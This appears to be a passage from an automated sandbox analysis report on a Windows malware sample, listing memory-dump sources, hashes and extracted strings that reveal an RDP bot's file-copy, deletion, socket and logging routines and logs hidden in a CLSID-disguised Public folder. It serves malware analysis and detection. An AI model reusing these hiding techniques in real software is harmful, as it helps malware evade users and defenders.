                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log
                                                                    • API String ID: 513531256-2601447032
                                                                    • Opcode ID: 1a7e9c9ec7bae933ecc4019bc3fe970f4cd41a9ad4663795c4800373867ad189
                                                                    • Instruction ID: 22d3a8711bb827171cba83affd83525ac5af9c183e10a8763ca389fbd672ae26
                                                                    • Opcode Fuzzy Hash: 1a7e9c9ec7bae933ecc4019bc3fe970f4cd41a9ad4663795c4800373867ad189
                                                                    • Instruction Fuzzy Hash: F8414921A0D68286F3309F19E8543B966A0FB88784F540035DACD87BAADF3DA6858F40
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log
                                                                    • API String ID: 513531256-2729875187
                                                                    • Opcode ID: b0e16de90528dddbaa36a4a9c88e4def37decd2482aa2aa138530108e3277cd1
                                                                    • Instruction ID: 6b2797ab815aff8d8be3cf07e0090f65078692455e54ea7e827fe3c1b393f27a
                                                                    • Opcode Fuzzy Hash: b0e16de90528dddbaa36a4a9c88e4def37decd2482aa2aa138530108e3277cd1
                                                                    • Instruction Fuzzy Hash: 2941B271A0C6C1A6F320DB55E8D53BA6351BB8A784F500075EA8D837B5DF3EE9858B02
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log
                                                                    • API String ID: 513531256-2115573132
                                                                    • Opcode ID: 5c96a4841fcf32cb0990ea46f84c34129a0b230b4ef58bcda0142fca1c46c413
                                                                    • Instruction ID: 51df0ccf804abd66d1a12af380f48a0e065f8e79715e52f53c7d2a931c677085
                                                                    • Opcode Fuzzy Hash: 5c96a4841fcf32cb0990ea46f84c34129a0b230b4ef58bcda0142fca1c46c413
                                                                    • Instruction Fuzzy Hash: 7D412A61A0D68686F220AB11F8543B97361BF89B80F540036DACE97BB6CF3DE586C740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno
                                                                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                                                                    • API String ID: 2918714741-1951032453
                                                                    • Opcode ID: bf1d470dad7813b6eb82becc460bb75d3bd86b9cfb0f4c6d0da023c0a12cc4cf
                                                                    • Instruction ID: 57769db1af62037c51d1ca51dd1d1245de97f98c06afe63c555d78d739987fb1
                                                                    • Opcode Fuzzy Hash: bf1d470dad7813b6eb82becc460bb75d3bd86b9cfb0f4c6d0da023c0a12cc4cf
                                                                    • Instruction Fuzzy Hash: 28219522A08F4796E7219F56E8807AA7369BB457E8F4440B9EE4C47B74DF7CE845C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno
                                                                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                                                    • API String ID: 2918714741-719680006
                                                                    • Opcode ID: 2e8051d9b5b72b6684ba0facfc9a1ee98fcb759099fd11aa89b7a5be63974849
                                                                    • Instruction ID: f26bef06008ea366f88f9764a1397b4cdcc38c5c34dc68e858f94d73bd28dd23
                                                                    • Opcode Fuzzy Hash: 2e8051d9b5b72b6684ba0facfc9a1ee98fcb759099fd11aa89b7a5be63974849
                                                                    • Instruction Fuzzy Hash: BC217162A08E4296E7619F56E8807AA3369FB457A4F4440B6EE4C47674DF3DE845C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CopyErrorFileLastfflushfwrite
                                                                    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                                                                    • API String ID: 2887799713-3464183404
                                                                    • Opcode ID: fb76c954d88b9053ab83afff5c59a0901bb37d9f6299ae46d9521e7db8808081
                                                                    • Instruction ID: c0176d2dd5c4f357d73bd75045303cef787900c2165e245b8b622a0beee001c4
                                                                    • Opcode Fuzzy Hash: fb76c954d88b9053ab83afff5c59a0901bb37d9f6299ae46d9521e7db8808081
                                                                    • Instruction Fuzzy Hash: 94414C51A0C616A1FB205ACEA40037977547F05BCCE544732EB0FCA7B0EE6EEAA5D381
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteErrorFileLast
                                                                    • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                                                                    • API String ID: 2018770650-4119452840
                                                                    • Opcode ID: 4c36aa7f3b25613b573234c00697934ff3ebae5c5bc87abfb6daebd341cfa17f
                                                                    • Instruction ID: 0d504f43b7d38c80e891414669ff8bd15b6427950ed1946062a7fcc483c7a4bf
                                                                    • Opcode Fuzzy Hash: 4c36aa7f3b25613b573234c00697934ff3ebae5c5bc87abfb6daebd341cfa17f
                                                                    • Instruction Fuzzy Hash: 39311C51F0C60761FE205E8CA4553BD33409F58796F154B32EB1ECBAB9AD3CA98593C2
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastsend
                                                                    • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                                                                    • API String ID: 1802528911-690514478
                                                                    • Opcode ID: b9325ee79a2b188466f86b99841bc5c96000ee70e936f5ce4159d23ac9abe904
                                                                    • Instruction ID: 3b354cd8d100b1925b43de66ba60dc15fb22244c62a97d1ffc122d30e5af7e71
                                                                    • Opcode Fuzzy Hash: b9325ee79a2b188466f86b99841bc5c96000ee70e936f5ce4159d23ac9abe904
                                                                    • Instruction Fuzzy Hash: 442132A5B18D4391E72247EBB8806BC264ABF157F0F4453B8DC3D47AF1CE2CA5468300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastsend
                                                                    • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                                                                    • API String ID: 1802528911-690514478
                                                                    • Opcode ID: e641228a5d57032de7d3a43c2c3a71ad25244e0471c0a3e277a8c55d2bd63119
                                                                    • Instruction ID: 0d9f27cad773af886b4b7a8d0c9abcb635e47fdfa6750bda5580da1d6044bf9a
                                                                    • Opcode Fuzzy Hash: e641228a5d57032de7d3a43c2c3a71ad25244e0471c0a3e277a8c55d2bd63119
                                                                    • Instruction Fuzzy Hash: 8A21F655F28D138AF6204B17A9406BC9241AF357F0F5403B1ED7C6BAF6CE2CA4059308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastsetsockopt
                                                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                    • API String ID: 1729277954-887953274
                                                                    • Opcode ID: f865cf548c056a74205e5b0bce117a0b920f0171c07566af664b5b3d4fc6a94a
                                                                    • Instruction ID: f387d8bac6cedbcda1626f49d95a6b99484b28ef1e32670194654777fabe0b2d
                                                                    • Opcode Fuzzy Hash: f865cf548c056a74205e5b0bce117a0b920f0171c07566af664b5b3d4fc6a94a
                                                                    • Instruction Fuzzy Hash: 1D11C871A0894286F310AB67F8401BA7665FF88760F104375EA6E837B4DF7CD64ACB01
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastsetsockopt
                                                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                    • API String ID: 1729277954-887953274
                                                                    • Opcode ID: 9a489855aa47a064eb53d80e0741d6a20afcea4c8e718cf091384bc24f6a8843
                                                                    • Instruction ID: 27efb3ef4fb7fede86cb3ab647988727855453ff75c62771fa9c01ed07f3d756
                                                                    • Opcode Fuzzy Hash: 9a489855aa47a064eb53d80e0741d6a20afcea4c8e718cf091384bc24f6a8843
                                                                    • Instruction Fuzzy Hash: 9711B971E08942CEF3109B27F800469A650FFA87A0F504276E97DA3BB5DF7CD50A8B04
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastsetsockopt
                                                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                    • API String ID: 1729277954-887953274
                                                                    • Opcode ID: 5b33547d2e8b2079c483bff5ae4c0ca30c3b29f38f34b3308c77c28b13d9fdbb
                                                                    • Instruction ID: 50d617040d8d4fb8e9c0884c514436c2805cb0120ae249172947cb8794f4c380
                                                                    • Opcode Fuzzy Hash: 5b33547d2e8b2079c483bff5ae4c0ca30c3b29f38f34b3308c77c28b13d9fdbb
                                                                    • Instruction Fuzzy Hash: 8D1142B2A1864796E334AF19E80067A77A0EF88754F504235E9AE83BB4DF7CD549CF00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastsetsockopt
                                                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                    • API String ID: 1729277954-887953274
                                                                    • Opcode ID: 91b357227b99bab9effa702d5ab2d6446ce4f24f9651ab396ace6123a249b1dc
                                                                    • Instruction ID: 2a3ce96c773be97b4fac22bbfd501176ef882bfab2d768748354f9fde67b20fa
                                                                    • Opcode Fuzzy Hash: 91b357227b99bab9effa702d5ab2d6446ce4f24f9651ab396ace6123a249b1dc
                                                                    • Instruction Fuzzy Hash: 6B113075A1C59296E330AF69E8004B566A1FF89754F104235EAED837B8EF7CD50A8F00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastsetsockopt
                                                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                    • API String ID: 1729277954-887953274
                                                                    • Opcode ID: bb776e6ec1625de7b5e10f3268d44c0e9dc8f51f6ab7e4191ff7ab127f8cc73c
                                                                    • Instruction ID: fa96cd19b0b60d3f2d9fe56aa5ed1e4a9aa9873d8a32622913dc2afc1629e5c5
                                                                    • Opcode Fuzzy Hash: bb776e6ec1625de7b5e10f3268d44c0e9dc8f51f6ab7e4191ff7ab127f8cc73c
                                                                    • Instruction Fuzzy Hash: 9A110870A081D2A6F364AB65F4840756660FF89754F504231EDAD83BF5DF7DD509CB02
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastsetsockopt
                                                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                    • API String ID: 1729277954-887953274
                                                                    • Opcode ID: 3bfaa4a80639916eba1a0dc93ee1bfbb9301a9e214be40c6f5af664c170a041f
                                                                    • Instruction ID: 96392233d462ee23b98f42f5f5bdf917eb723852cf4880b8a591e347f2f528ca
                                                                    • Opcode Fuzzy Hash: 3bfaa4a80639916eba1a0dc93ee1bfbb9301a9e214be40c6f5af664c170a041f
                                                                    • Instruction Fuzzy Hash: 9D112E71A0C55696F360AB26E8004666671AF88754F104237EAEE836B5DF7CD549CB00
                                                                    APIs
                                                                    Strings
                                                                    • [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFE1330631F
                                                                    • routine_tx, xrefs: 00007FFE13306318
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterHeapLeave$FreeProcess
                                                                    • String ID: [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                                                                    • API String ID: 2539320189-3555278722
                                                                    • Opcode ID: 36001a8ed69bcda54c651700ee6af56c6e3160d2e789e3dc6c537e90f91aaa97
                                                                    • Instruction ID: 857fa6a8120e158d4b3d94f9c1b01cd919513c2fc3f3ee2a1983c21cddc47daf
                                                                    • Opcode Fuzzy Hash: 36001a8ed69bcda54c651700ee6af56c6e3160d2e789e3dc6c537e90f91aaa97
                                                                    • Instruction Fuzzy Hash: 7C310C35A08E02CAEB248B13E840229B364EB64BB4F184175DA6D67B79CF3CE4419348
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
